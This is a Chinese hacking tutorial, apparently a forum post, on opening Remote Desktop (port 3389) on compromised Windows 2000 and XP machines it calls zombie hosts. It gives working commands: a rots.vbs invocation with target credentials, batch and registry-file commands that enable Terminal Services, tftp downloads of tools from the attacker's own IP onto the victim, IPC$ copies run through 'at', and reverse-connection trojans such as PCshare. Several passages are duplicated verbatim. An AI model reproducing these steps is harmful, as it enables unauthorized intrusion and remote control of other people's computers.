网络上有很多开3389的方法,下面我谈谈我平时开3389的方法:
Win2000:
1.rots.vbs
用法:cscript rots.vbs IP "用户名" "密码" 3389 参数
参数为: /r表示自动重起,/fr表示强制重启
例子:肉鸡11.11.11.11 账号Administrator密码为空
cscript rots.vbs 11.11.11.11 "administrator" "" 3389 /r
失败的原因:1.你解压的地方不对,例如你把rots.vbs解压在c:\rots\rots.vbs,而你这时在c:这个目录里弄了半天,当然不行,你要先用cd rots弄到rots这个目录里,再用上面的方法即可.出现这种的多做为学dos很粗的半懂半不懂的小鸟。
2.对方没有共享netbios,因为这个东东是依赖于对方开netbios。
3.你是在局域网,这也是可能失败的一个原因,对于这个,我也不知道原因。
4.对方是WinPro的,这个版本是没有3389服务的。
以上为常出现的几种错误。
2.命令行输入
你可以用telnet形式或者做成一个批处理(*.bat)让对方运行,代码如下:
echo [components] > c:\sql
echo TSEnable = on >> c:\sql
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
等一会儿你就可以连接上去了。
常见错误:有的机子会自动重起,但有的不会。所以成功率并不是100%.
3.3389.exe或者HBULOT.exe这个小工具。(本站有下载在linzi.rar里面)
常见的攻击方法为:
1.你溢出一台机子成功,这时界面为在dos下,你在本地建立tftp
然后你在dos下输入tftp -i 你自己的IP get 3389.exe
最后你在对方c:\winnt\system32\下输入3389.exe,这时对方的机子会重起,当然,你用tftp这个命令时也要在c:\winnt\system32\这个目录下,因为tftp是放在c:\winnt\system32\这个目录里。
2.你用和对方建立ipc,然后copy过去,再用at命令,这时也是可以成功的。
3.用木马植入器.如20CN扫描器,啊D工具包。
这种方法成功率100%
3.3389.exe或者HBULOT.exe这个小工具。(本站有下载在linzi.rar里面)
常见的攻击方法为:
1.你溢出一台机子成功,这时界面为在dos下,你在本地建立tftp
然后你在dos下输入tftp -i 你自己的IP get 3389.exe
最后你在对方c:\winnt\system32\下输入3389.exe,这时对方的机子会重起,当然,你用tftp这个命令时也要在c:\winnt\system32\这个目录下,因为tftp是放在c:\winnt\system32\这个目录里。
2.你用和对方建立ipc,然后copy过去,再用at命令,这时也是可以成功的。
3.用木马植入器.如20CN扫描器,啊D工具包。
这种方法成功率100%
4.木马
你可以采用很多可以开服务的木马,例如20CN的反弹木马PCshare。当然还有其它的,你可自己去找,网上这种马多如牛毛。
好了,以上为开2K3389的几种常用方法,下面我说说开XP的方法,以及开3389的原理。
3389之XP篇
1.我先用一个例子来说:
代码:
echo REGEDIT4 > C:\linzi.reg
echo. >> c:\linzi.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Control\Terminal Server] >> c:\linzi.reg
echo "fdenytsconnections"=dword:000000 >> c:\linzi.reg
echo "TSEnable"=dword:00000001 >> c:\linzi.reg
你可以用telnet或者溢出各种界面下输入上面的代码。它会在c:\生成一个linzi.reg的文件,这时你把目录切换到c:\然后把linzi.reg导入注册表即可,你可以输入linzi.reg /s等,方法你自己去想,只要把它导入注册表即可。
2.HBULOT.exe或者xp3389.exe
方法一般为用tftp上传到对方目录下,然后运行,这时你就可以打开3389登陆器登上去了.
原理篇
可以说有没有开3389服务,最关键的是在于注册表,对Bill来说,注册表是它的灵魂,熟悉注册表的人都知道注册表的强大,我们平时所用的木马,所有的软件,要运行都要和注册表"发生关系".
所以开3389,我们重要的也就在于对注册表的修改,不管是2K的还是XP,所以我们开3389的思路也就来了,就是在没开3389之前TS的注册表和开完后TS的注册表之间的差异也就是我们要找的关键.
好了,大家多想一下,原理其实也很简单,过些天我做成动画给大家看!
失败的原因:1.你解压的地方不对,例如你把rots.vbs解压在c:\rots\rots.vbs,而你这时在c:这个目录里弄了半天,当然不行,你要先用cd rots弄到rots这个目录里,再用上面的方法即可.出现这种的多做为学dos很粗的半懂半不懂的小鸟。
2.对方没有共享netbios,因为这个东东是依赖于对方开netbios。
3.你是在局域网,这也是可能失败的一个原因,对于这个,我也不知道原因。
4.对方是WinPro的,这个版本是没有3389服务的。 |
